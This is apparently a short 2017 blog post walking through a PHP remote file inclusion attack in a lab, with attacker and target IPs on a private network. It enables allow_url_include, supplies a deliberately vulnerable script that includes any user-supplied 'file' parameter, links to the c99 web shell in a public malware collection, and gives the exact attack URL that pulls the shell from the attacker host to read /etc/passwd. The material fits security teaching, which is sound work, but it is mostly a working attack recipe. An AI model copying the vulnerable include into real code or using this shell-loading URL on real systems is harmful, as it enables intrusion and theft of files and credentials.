Friday, February 3, 2017

PHP Remote File Inclusion Example

attacker ip: 192.168.56.1
target ip : 192.168.56.23

1- allow url include by change the option below in /etc/php/apache2/php.ini
allow_url_include=1

2- create a php file with the following content and host it in a website.
<?php
$incfile = $_REQUEST["file"];
include($incfile);
echo "Welcome Here!";
?>



3- on attacker host, also need to host a php shell as well, download the file from the link below and host it in a website.
https://raw.githubusercontent.com/tennc/webshell/master/web-malware-collection-13-06-2012/PHP/c99.txt

4- then we can use the following url to gain shell on target host.
http://192.168.56.23/vul/index.php?file=http://192.168.56.1/c99.txt


below is the screenshot of the shell, and we  use it to read /etc/passwd on target host.


No comments:

Post a Comment